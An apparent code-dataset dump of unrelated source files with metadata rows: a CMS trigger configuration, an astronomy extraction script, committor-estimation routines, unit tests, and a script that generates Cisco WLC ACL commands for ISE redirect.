        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCconsistentSlopeCorr_ME11_even_GE11_layer1.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCconsistentSlopeCorr_ME11_even_GE11_layer2.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCconsistentSlopeCorr_ME11_odd_GE11_layer1.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCconsistentSlopeCorr_ME11_odd_GE11_layer2.txt",
    ),
    # convert differences in 1/8-strip numbers between GEM and CSC to Run-3 slopes
    esDiffToSlopeME1aFiles = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME1a_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME1a_odd.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME1a_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME1a_odd.txt",
    ),
    esDiffToSlopeME1bFiles = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME1b_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME1b_odd.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME1b_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME1b_odd.txt",
    ),
    esDiffToSlopeME21Files = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME21_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME21_odd.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME21_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME21_odd.txt",
    ),
)

# Bundle the LUT parameters with both coincidence-pad PSets for consumers.
gemcscPSets = cms.PSet(
    gemcscParams.clone(),
    copadParamGE11 = copadParamGE11.clone(),
    copadParamGE21 = copadParamGE21.clone(),
)
| 68.512
| 141
| 0.806516
| 933
| 8,564
| 7.085745
| 0.11254
| 0.245651
| 0.279534
| 0.330358
| 0.879292
| 0.877477
| 0.877477
| 0.877477
| 0.868855
| 0.831644
| 0
| 0.042341
| 0.11198
| 8,564
| 124
| 142
| 69.064516
| 0.826956
| 0.086875
| 0
| 0.15534
| 0
| 0
| 0.755133
| 0.755133
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009709
| 0
| 0.009709
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
333107e0dcfc20ba5d66fc15b7d9e367c7645b8f
| 841
|
py
|
Python
|
sdi_pipeline/extract.py
|
andrewhstewart/SDI
|
19d52bd5e13c2128c083776712672becf8b6ab45
|
[
"MIT"
] | null | null | null |
sdi_pipeline/extract.py
|
andrewhstewart/SDI
|
19d52bd5e13c2128c083776712672becf8b6ab45
|
[
"MIT"
] | null | null | null |
sdi_pipeline/extract.py
|
andrewhstewart/SDI
|
19d52bd5e13c2128c083776712672becf8b6ab45
|
[
"MIT"
] | null | null | null |
import sex
import psf
import glob
def EXTRACT():
    """Run source extraction over all FITS exposures in a target directory.

    Prompts for the exposure-time directory, then runs the SExtractor wrapper
    (building the PSF models with PSFEx first whenever they are missing or
    incomplete) and filters the resulting source lists.
    """
    path = input("-> Enter path to target's exposure time directory: ")
    images = glob.glob(path + '/data/*.fits')
    psf_data = glob.glob(path + '/psf/*')
    # A complete PSF set has 3 files per image; otherwise (re)build it first.
    if len(psf_data) != 3*len(images):
        sex.sextractor_psf(path)
        psf.psfex(path)
    # Common tail -- previously duplicated verbatim in both branches.
    sex.sextractor(path)
    sex.src_filter(path)
if __name__ == '__main__':
    # The guard previously duplicated EXTRACT()'s body line for line;
    # delegate so the extraction logic lives in exactly one place.
    EXTRACT()
| 29
| 71
| 0.601665
| 113
| 841
| 4.318584
| 0.247788
| 0.159836
| 0.098361
| 0.163934
| 0.901639
| 0.901639
| 0.901639
| 0.901639
| 0.901639
| 0.901639
| 0
| 0.003185
| 0.25327
| 841
| 29
| 72
| 29
| 0.773885
| 0
| 0
| 0.814815
| 0
| 0
| 0.173397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.111111
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3370f54fb3b010ebf8de19bf156d15fd2b07fb1c
| 172
|
py
|
Python
|
library/__init__.py
|
AmirHosseinAmeli/Triple-GAN
|
127948d9e22767d315a4b3ca58fc4a56d92ff9d3
|
[
"MIT"
] | 29
|
2020-09-03T08:35:47.000Z
|
2022-02-10T18:39:29.000Z
|
library/__init__.py
|
AmirHosseinAmeli/Triple-GAN
|
127948d9e22767d315a4b3ca58fc4a56d92ff9d3
|
[
"MIT"
] | 6
|
2020-12-22T14:43:14.000Z
|
2022-03-12T00:55:24.000Z
|
library/__init__.py
|
AmirHosseinAmeli/Triple-GAN
|
127948d9e22767d315a4b3ca58fc4a56d92ff9d3
|
[
"MIT"
] | 8
|
2020-10-01T04:03:40.000Z
|
2022-03-21T10:23:40.000Z
|
from . import inputs
from . import data_iters
# from . import model_discriminators
# from . import model_generators
# from . import model_layers
from . import randaugment
| 21.5
| 36
| 0.784884
| 22
| 172
| 5.954545
| 0.454545
| 0.458015
| 0.343511
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 172
| 8
| 37
| 21.5
| 0.909722
| 0.534884
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
68268083c69beec46b4742a2ad4e6ee152ef7ed1
| 1,620
|
py
|
Python
|
py/tests/problems/heap/regular_numbers.py
|
bmoretz/Daily-Coding-Problem
|
f79e062e9f6e7b18b7e95c071fbe71ad104affcb
|
[
"MIT"
] | 1
|
2020-06-26T13:28:43.000Z
|
2020-06-26T13:28:43.000Z
|
py/tests/problems/heap/regular_numbers.py
|
bmoretz/Daily-Coding-Problem
|
f79e062e9f6e7b18b7e95c071fbe71ad104affcb
|
[
"MIT"
] | 7
|
2021-11-18T19:46:08.000Z
|
2022-03-12T01:03:01.000Z
|
py/tests/problems/heap/regular_numbers.py
|
bmoretz/Daily-Coding-Problem
|
f79e062e9f6e7b18b7e95c071fbe71ad104affcb
|
[
"MIT"
] | null | null | null |
import unittest
from dcp.problems.heap.regular_numbers import regular_numbers1, regular_numbers2
class Test_RegularNumbers1(unittest.TestCase):
def setUp(self):
self.regulars = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 25,
27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80, 81, 90, 96, 100,
108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192, 200, 216, 225, 240,
243, 250, 256, 270, 288, 300, 320, 324, 360, 375, 384, 400, 405, 432, 450, 480,
486, 500, 512, 540, 576, 600, 625, 640, 648, 675, 720, 729, 750, 768, 800, 810,
864, 900, 960, 972, 1000, 1024, 1080, 1125, 1152, 1200, 1215, 1250, 1280, 1296,
1350, 1440, 1458, 1500, 1536]
def test_case1(self):
assert regular_numbers1(10) == self.regulars[:10]
class Test_RegularNumbers2(unittest.TestCase):
def setUp(self):
self.regulars = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 25,
27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80, 81, 90, 96, 100,
108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192, 200, 216, 225, 240,
243, 250, 256, 270, 288, 300, 320, 324, 360, 375, 384, 400, 405, 432, 450, 480,
486, 500, 512, 540, 576, 600, 625, 640, 648, 675, 720, 729, 750, 768, 800, 810,
864, 900, 960, 972, 1000, 1024, 1080, 1125, 1152, 1200, 1215, 1250, 1280, 1296,
1350, 1440, 1458, 1500, 1536]
def test_case1(self):
assert list(regular_numbers2(10)) == self.regulars[:10]
| 50.625
| 96
| 0.541975
| 256
| 1,620
| 3.394531
| 0.476563
| 0.055236
| 0.043728
| 0.055236
| 0.773303
| 0.773303
| 0.773303
| 0.773303
| 0.773303
| 0.773303
| 0
| 0.500888
| 0.304938
| 1,620
| 31
| 97
| 52.258065
| 0.27087
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.166667
| false
| 0
| 0.083333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
682df13b85ef649423b6b0c32a22853008f7e1aa
| 10,193
|
py
|
Python
|
extq/dga.py
|
dinner-group/insulin-hexamer
|
6dfd3b9d197ceea73ca86f79ba734578e54f0a25
|
[
"MIT"
] | null | null | null |
extq/dga.py
|
dinner-group/insulin-hexamer
|
6dfd3b9d197ceea73ca86f79ba734578e54f0a25
|
[
"MIT"
] | null | null | null |
extq/dga.py
|
dinner-group/insulin-hexamer
|
6dfd3b9d197ceea73ca86f79ba734578e54f0a25
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy import linalg
from scipy import sparse
from .stop import backward_stop
from .stop import forward_stop
def forward_committor(basis, weights, in_domain, guess, lag, test_basis=None):
    """Estimate the forward committor using DGA.

    Parameters
    ----------
    basis : list of (n_frames[i], n_basis) ndarray of float
        Basis for estimating the committor; must vanish outside the domain.
    weights : list of (n_frames[i],) ndarray of float
        Reweighting factor to the invariant distribution for each frame.
    in_domain : list of (n_frames[i],) ndarray of bool
        Whether each frame of the trajectories is in the domain.
    guess : list of (n_frames[i],) ndarray of float
        Guess for the committor; must obey the boundary conditions.
    lag : int
        DGA lag time in units of frames.
    test_basis : list of (n_frames[i], n_basis) ndarray of float, optional
        Test basis against which to minimize the error. Must have the same
        dimension as `basis`. Defaults to `basis` itself.

    Returns
    -------
    list of (n_frames[i],) ndarray
        Estimate of the forward committor at each frame of each trajectory.
    """
    if test_basis is None:
        test_basis = basis
    lhs = 0.0
    rhs = 0.0
    for phi, psi, wgt, dom, gss in zip(test_basis, basis, weights, in_domain, guess):
        # The final `lag` frames must carry zero weight.
        assert np.all(wgt[-lag:] == 0.0)
        # Lag-time partner of each frame, stopped at the first domain exit.
        stopped = np.minimum(np.arange(lag, len(dom)), forward_stop(dom)[:-lag])
        assert np.all(stopped < len(dom))
        weighted_test = phi[:-lag].T * wgt[:-lag]
        lhs += weighted_test @ (psi[stopped] - psi[:-lag])
        rhs -= weighted_test @ (gss[stopped] - gss[:-lag])
    coeffs = linalg.solve(lhs, rhs)
    return [b @ coeffs + g for b, g in zip(basis, guess)]
def backward_committor(basis, weights, in_domain, guess, lag, test_basis=None):
    """Estimate the backward committor using DGA.

    Parameters
    ----------
    basis : list of (n_frames[i], n_basis) ndarray of float
        Basis for estimating the committor; must vanish outside the domain.
    weights : list of (n_frames[i],) ndarray of float
        Reweighting factor to the invariant distribution for each frame.
    in_domain : list of (n_frames[i],) ndarray of bool
        Whether each frame of the trajectories is in the domain.
    guess : list of (n_frames[i],) ndarray of float
        Guess for the committor; must obey the boundary conditions.
    lag : int
        DGA lag time in units of frames.
    test_basis : list of (n_frames[i], n_basis) ndarray of float, optional
        Test basis against which to minimize the error. Must have the same
        dimension as `basis`. Defaults to `basis` itself.

    Returns
    -------
    list of (n_frames[i],) ndarray
        Estimate of the backward committor at each frame of each trajectory.
    """
    if test_basis is None:
        test_basis = basis
    lhs = 0.0
    rhs = 0.0
    for phi, psi, wgt, dom, gss in zip(test_basis, basis, weights, in_domain, guess):
        # The final `lag` frames must carry zero weight.
        assert np.all(wgt[-lag:] == 0.0)
        # Reverse-time lag partner of each frame, stopped at the domain exit.
        stopped = np.maximum(np.arange(len(dom) - lag), backward_stop(dom)[lag:])
        assert np.all(stopped >= 0)
        weighted_test = phi[lag:].T * wgt[:-lag]
        lhs += weighted_test @ (psi[stopped] - psi[lag:])
        rhs -= weighted_test @ (gss[stopped] - gss[lag:])
    coeffs = linalg.solve(lhs, rhs)
    return [b @ coeffs + g for b, g in zip(basis, guess)]
def forward_committor_sparse(
    basis, weights, in_domain, guess, lag, test_basis=None
):
    """Estimate the forward committor using DGA with sparse basis sets.

    Parameters
    ----------
    basis : list of (n_frames[i], n_basis) sparse matrix of float
        Sparse basis for the committor estimate. Must vanish outside of
        the domain.
    weights : list of (n_frames[i],) ndarray of float
        Change of measure to the invariant distribution for each frame.
    in_domain : list of (n_frames[i],) ndarray of bool
        Whether each frame of the trajectories is inside the domain.
    guess : list of (n_frames[i],) ndarray of float
        Guess committor. Must satisfy the boundary conditions.
    lag : int
        DGA lag time in units of frames.
    test_basis : list of (n_frames[i], n_basis) sparse matrix of float, optional
        Sparse test basis against which the error is minimized. Must
        have the same dimension as ``basis``. Defaults to ``basis``.

    Returns
    -------
    list of (n_frames[i],) ndarray
        Forward committor estimate at each frame of each trajectory.
    """
    test = basis if test_basis is None else test_basis
    lhs = 0.0
    rhs = 0.0
    for phi, psi, wgt, dom, gss in zip(test, basis, weights, in_domain, guess):
        # The last `lag` weights of each trajectory must be zero.
        assert np.all(wgt[-lag:] == 0.0)
        # Forward endpoint for each frame: `lag` steps ahead, or the first
        # exit from the domain, whichever comes first.
        stopped = np.minimum(np.arange(lag, len(dom)), forward_stop(dom)[:-lag])
        assert np.all(stopped < len(dom))
        weighted = phi[:-lag].T @ sparse.diags(wgt[:-lag])
        lhs += weighted @ (psi[stopped] - psi[:-lag])
        rhs -= weighted @ (gss[stopped] - gss[:-lag])
    coeffs = sparse.linalg.spsolve(lhs, rhs)
    return [psi @ coeffs + gss for psi, gss in zip(basis, guess)]
def backward_committor_sparse(
    basis, weights, in_domain, guess, lag, test_basis=None
):
    """Estimate the backward committor using DGA with sparse basis sets.

    Parameters
    ----------
    basis : list of (n_frames[i], n_basis) sparse matrix of float
        Sparse basis for the committor estimate. Must vanish outside of
        the domain.
    weights : list of (n_frames[i],) ndarray of float
        Change of measure to the invariant distribution for each frame.
    in_domain : list of (n_frames[i],) ndarray of bool
        Whether each frame of the trajectories is inside the domain.
    guess : list of (n_frames[i],) ndarray of float
        Guess committor. Must satisfy the boundary conditions.
    lag : int
        DGA lag time in units of frames.
    test_basis : list of (n_frames[i], n_basis) sparse matrix of float, optional
        Sparse test basis against which the error is minimized. Must
        have the same dimension as ``basis``. Defaults to ``basis``.

    Returns
    -------
    list of (n_frames[i],) ndarray
        Backward committor estimate at each frame of each trajectory.
    """
    test = basis if test_basis is None else test_basis
    lhs = 0.0
    rhs = 0.0
    for phi, psi, wgt, dom, gss in zip(test, basis, weights, in_domain, guess):
        # The last `lag` weights of each trajectory must be zero.
        assert np.all(wgt[-lag:] == 0.0)
        # Backward-in-time endpoint for each frame: `lag` steps back, or
        # the last exit from the domain, whichever is more recent.
        stopped = np.maximum(np.arange(len(dom) - lag), backward_stop(dom)[lag:])
        assert np.all(stopped >= 0)
        weighted = phi[lag:].T @ sparse.diags(wgt[:-lag])
        lhs += weighted @ (psi[stopped] - psi[lag:])
        rhs -= weighted @ (gss[stopped] - gss[lag:])
    coeffs = sparse.linalg.spsolve(lhs, rhs)
    return [psi @ coeffs + gss for psi, gss in zip(basis, guess)]
def reweight(basis, lag, guess=None, test_basis=None):
"""Estimate the reweighting factors to the invariant distribution.
Parameters
----------
basis : list of (n_frames[i], n_basis) ndarray of float
Basis for estimating the reweighting factors.
lag : int
Lag time in unit of frames.
guess : list of (n_frames[i],) ndarray of float, optional
Guess for the reweighting factors. The last lag frames of each
trajectory must be zero.
If None, use uniform weights (except for the last lag frames).
test_basis : list of (n_frames[i], n_basis) ndarray of float, optional
Test basis against which to minimize the error. Must have the
same dimension as the basis used to estimate the reweighting
factors.
If None, use the basis that is used to estimate the reweighting
factors.
Returns
-------
list of (n_frames[i],) ndarray
Estimate of the reweighting factors at each frame of the
trajectory.
"""
if test_basis is None:
test_basis = basis
if guess is None:
guess = []
for x in basis:
w = np.ones(len(x))
w[-lag:] = 0.0
guess.append(w)
a = 0.0
b = 0.0
for x, y, w in zip(test_basis, basis, guess):
assert np.all(w[-lag:] == 0.0)
a += ((x[lag:] - x[:-lag]).T * w[:-lag]) @ y[:-lag]
b -= (x[lag:] - x[:-lag]).T @ w[:-lag]
coeffs = linalg.solve(a, b)
return [w * (y @ coeffs + 1.0) for y, w in zip(basis, guess)]
def reweight_sparse(basis, lag, guess=None, test_basis=None):
"""Estimate the reweighting factors to the invariant distribution
using sparse basis sets.
Parameters
----------
basis : list of (n_frames[i], n_basis) sparse matrix of float
Sparse basis for estimating the reweighting factors.
lag : int
Lag time in unit of frames.
guess : list of (n_frames[i],) ndarray of float, optional
Guess for the reweighting factors. The last lag frames of each
trajectory must be zero.
If None, use uniform weights (except for the last lag frames).
test_basis : list of (n_frames[i], n_basis) sparse matrix of float, optional
Sparse test basis against which to minimize the error. Must have
the same dimension as the basis used to estimate the reweighting
factors.
If None, use the basis that is used to estimate the reweighting
factors.
Returns
-------
list of (n_frames[i],) ndarray
Estimate of the reweighting factors at each frame of the
trajectory.
"""
if test_basis is None:
test_basis = basis
if guess is None:
guess = []
for x in basis:
w = np.ones(x.shape[0])
w[-lag:] = 0.0
guess.append(w)
a = 0.0
b = 0.0
for x, y, w in zip(test_basis, basis, guess):
assert np.all(w[-lag:] == 0.0)
a += (x[lag:] - x[:-lag]).T @ sparse.diags(w[:-lag]) @ y[:-lag]
b -= (x[lag:] - x[:-lag]).T @ w[:-lag]
coeffs = sparse.linalg.spsolve(a, b)
return [w * (y @ coeffs + 1.0) for y, w in zip(basis, guess)]
| 37.751852
| 80
| 0.616207
| 1,567
| 10,193
| 3.945118
| 0.067645
| 0.05241
| 0.036234
| 0.067292
| 0.976221
| 0.976221
| 0.973148
| 0.971368
| 0.966516
| 0.966516
| 0
| 0.006351
| 0.274012
| 10,193
| 269
| 81
| 37.892193
| 0.829054
| 0.570686
| 0
| 0.757895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.063158
| false
| 0
| 0.052632
| 0
| 0.178947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
683173fff10d3c84009264ee3d8b375c12f0a67d
| 174
|
py
|
Python
|
firmware/python/simple_zcu216_example/__init__.py
|
slaclab/Simple-ZCU216-Example
|
db0c08870a2ed846935c9abf2565beacd2954920
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
firmware/python/simple_zcu216_example/__init__.py
|
slaclab/Simple-ZCU216-Example
|
db0c08870a2ed846935c9abf2565beacd2954920
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
firmware/python/simple_zcu216_example/__init__.py
|
slaclab/Simple-ZCU216-Example
|
db0c08870a2ed846935c9abf2565beacd2954920
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from simple_zcu216_example._Application import *
from simple_zcu216_example._XilinxZcu216 import *
from simple_zcu216_example._Root import *
| 43.5
| 57
| 0.706897
| 18
| 174
| 6.333333
| 0.444444
| 0.263158
| 0.421053
| 0.605263
| 0.508772
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 0.258621
| 174
| 3
| 58
| 58
| 0.790698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
68349bb23c778d357cc7ca8428c35566268e0405
| 117
|
py
|
Python
|
anotherexamples/implement_app.py
|
podishad/pythontutorial
|
50a7431064e15f26afcb6b0cd34226e228222813
|
[
"Apache-2.0"
] | null | null | null |
anotherexamples/implement_app.py
|
podishad/pythontutorial
|
50a7431064e15f26afcb6b0cd34226e228222813
|
[
"Apache-2.0"
] | null | null | null |
anotherexamples/implement_app.py
|
podishad/pythontutorial
|
50a7431064e15f26afcb6b0cd34226e228222813
|
[
"Apache-2.0"
] | null | null | null |
# Demo of importing and using a sibling module's helpers.
import useful_tools
# Presumably rolls a die with 20 sides — TODO confirm against useful_tools.
print(useful_tools.roll_dice(20))
# Print the whole collection, then the element at index 5.
# NOTE(review): the attribute is spelled "employess" — looks like a typo
# carried over from useful_tools; confirm before renaming anywhere.
print(useful_tools.employess)
print(useful_tools.employess[5])
| 23.4
| 33
| 0.846154
| 18
| 117
| 5.222222
| 0.5
| 0.468085
| 0.510638
| 0.531915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026786
| 0.042735
| 117
| 5
| 34
| 23.4
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
683e76f08e7cb5f5f4efc74111b59cedb8672b68
| 9,051
|
py
|
Python
|
wlc_acl_ise.py
|
andreirapuru/wlc_acl_redirect
|
0d638f416ba912eaa98d30e0b58c97380b3f9488
|
[
"MIT"
] | null | null | null |
wlc_acl_ise.py
|
andreirapuru/wlc_acl_redirect
|
0d638f416ba912eaa98d30e0b58c97380b3f9488
|
[
"MIT"
] | 1
|
2021-02-19T20:51:05.000Z
|
2021-02-19T20:51:49.000Z
|
wlc_acl_ise.py
|
andreirapuru/wlc_acl_redirect
|
0d638f416ba912eaa98d30e0b58c97380b3f9488
|
[
"MIT"
] | null | null | null |
#Author: Andre Ortega, brainwork.com.br
#https://github.com/andreirapuru/wlc_acl_redirect
# Generates Cisco WLC 'config acl ...' command lines for the ISE posture and
# webauth redirect ACLs, appends them to here_are_your_acls.txt, and echoes
# the resulting file to the console.
#
# Fixes vs. original: file handles are managed with `with` (the read handle
# was never closed), and ~100 near-identical acl.write lines are collapsed
# into helpers that emit byte-identical output.

# Host netmask used for every address entry.
_HOST_MASK = '255.255.255.255'

# (protocol, port) pairs permitted to/from each PSN, per ACL.
_POSTURE_PSN_PORTS = [('6', '8443'), ('6', '8905'), ('17', '8905'),
                      ('6', '8909'), ('17', '8909')]
_WEBAUTH_PSN_PORTS = [('6', '8443')]


def _write_dest_rule(acl, name, ace, protocol=None, port=None, address=None):
    """Write one client->server rule: protocol, destination port,
    destination address (each optional), then the permit action."""
    acl.write('\nconfig acl rule add ' + name + ' ' + str(ace))
    if protocol is not None:
        acl.write('\nconfig acl rule protocol ' + name + ' ' + str(ace) + ' ' + protocol)
    if port is not None:
        acl.write('\nconfig acl rule destination port range ' + name + ' ' + str(ace) + ' ' + port + ' ' + port)
    if address is not None:
        acl.write('\nconfig acl rule destination address ' + name + ' ' + str(ace) + ' ' + address + ' ' + _HOST_MASK)
    acl.write('\nconfig acl rule action ' + name + ' ' + str(ace) + ' permit')
    acl.write('\n')


def _write_source_rule(acl, name, ace, protocol=None, port=None, address=None):
    """Write one return-traffic rule: source port, source address,
    protocol (each optional), then the permit action.
    Field order matches the original script's output exactly."""
    acl.write('\nconfig acl rule add ' + name + ' ' + str(ace))
    if port is not None:
        acl.write('\nconfig acl rule source port range ' + name + ' ' + str(ace) + ' ' + port + ' ' + port)
    if address is not None:
        acl.write('\nconfig acl rule source address ' + name + ' ' + str(ace) + ' ' + address + ' ' + _HOST_MASK)
    if protocol is not None:
        acl.write('\nconfig acl rule protocol ' + name + ' ' + str(ace) + ' ' + protocol)
    acl.write('\nconfig acl rule action ' + name + ' ' + str(ace) + ' permit')
    acl.write('\n')


def _write_acl(acl, banner, name, psn_ports, psn_hosts, remediation_hosts):
    """Write one complete ACL: banner, create command, DNS rules, per-PSN
    rule pairs, per-remediation-host rule pairs, and the apply command
    (no trailing newline, matching the original output)."""
    acl.write(banner)
    acl.write('\n')
    acl.write('\nconfig acl create ' + name)
    acl.write('\n')
    ace = 1
    _write_dest_rule(acl, name, ace, protocol='17', port='53')    # DNS out
    ace += 1
    _write_source_rule(acl, name, ace, protocol='17', port='53')  # DNS back
    for host in psn_hosts:
        for protocol, port in psn_ports:
            ace += 1
            _write_dest_rule(acl, name, ace, protocol=protocol, port=port, address=host)
            ace += 1
            _write_source_rule(acl, name, ace, protocol=protocol, port=port, address=host)
    for host in remediation_hosts:
        ace += 1
        _write_dest_rule(acl, name, ace, address=host)
        ace += 1
        _write_source_rule(acl, name, ace, address=host)
    acl.write('\nconfig acl apply ' + name)


print('\n********************************** Script initiated **********************************')
print('\n')
psnlist = []
avlist = []
psns = int(input('PSNs: '))
avs = int(input('Remediation:'))
for i in range(psns):
    psnlist.append(input('IP Address PSN' + str(i + 1) + ': '))
for i in range(avs):
    avlist.append(input('IP Address Remediation' + str(i + 1) + ': '))

# Create a .txt file with the ACLs.
# NOTE(review): opened in append mode, so repeated runs keep accumulating
# output — preserved from the original script; confirm this is intended.
with open('here_are_your_acls.txt', 'a') as acl:
    _write_acl(
        acl,
        '\n******************************** ACL POSTURE REDIRECT ********************************',
        'ACL_POSTURE_REDIRECT', _POSTURE_PSN_PORTS, psnlist, avlist,
    )
    acl.write('\n')
    _write_acl(
        acl,
        '\n******************************** ACL WEBAUTH REDIRECT ********************************',
        'ACL_WEBAUTH_REDIRECT', _WEBAUTH_PSN_PORTS, psnlist, [],
    )

# Echo the generated commands (original leaked this handle).
with open('here_are_your_acls.txt', 'r') as output:
    print(output.read())
print('\n''********************************** Script finished **********************************')
| 55.189024
| 119
| 0.693404
| 1,371
| 9,051
| 4.44639
| 0.052516
| 0.145669
| 0.211614
| 0.253937
| 0.932907
| 0.927657
| 0.92044
| 0.92044
| 0.91519
| 0.908301
| 0
| 0.040827
| 0.123191
| 9,051
| 163
| 120
| 55.527607
| 0.727319
| 0.013037
| 0
| 0.765101
| 0
| 0
| 0.607049
| 0.035816
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.026846
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
684215d9eaa10ef78f247a00ad9ca4052463b7c6
| 20,854
|
py
|
Python
|
scripts/abis.py
|
rarity-adventure/rarity-integration
|
6cb142c129affd56066d7b9565a2f9055ac207f5
|
[
"MIT"
] | null | null | null |
scripts/abis.py
|
rarity-adventure/rarity-integration
|
6cb142c129affd56066d7b9565a2f9055ac207f5
|
[
"MIT"
] | null | null | null |
scripts/abis.py
|
rarity-adventure/rarity-integration
|
6cb142c129affd56066d7b9565a2f9055ac207f5
|
[
"MIT"
] | 1
|
2022-02-09T06:04:44.000Z
|
2022-02-09T06:04:44.000Z
|
import json
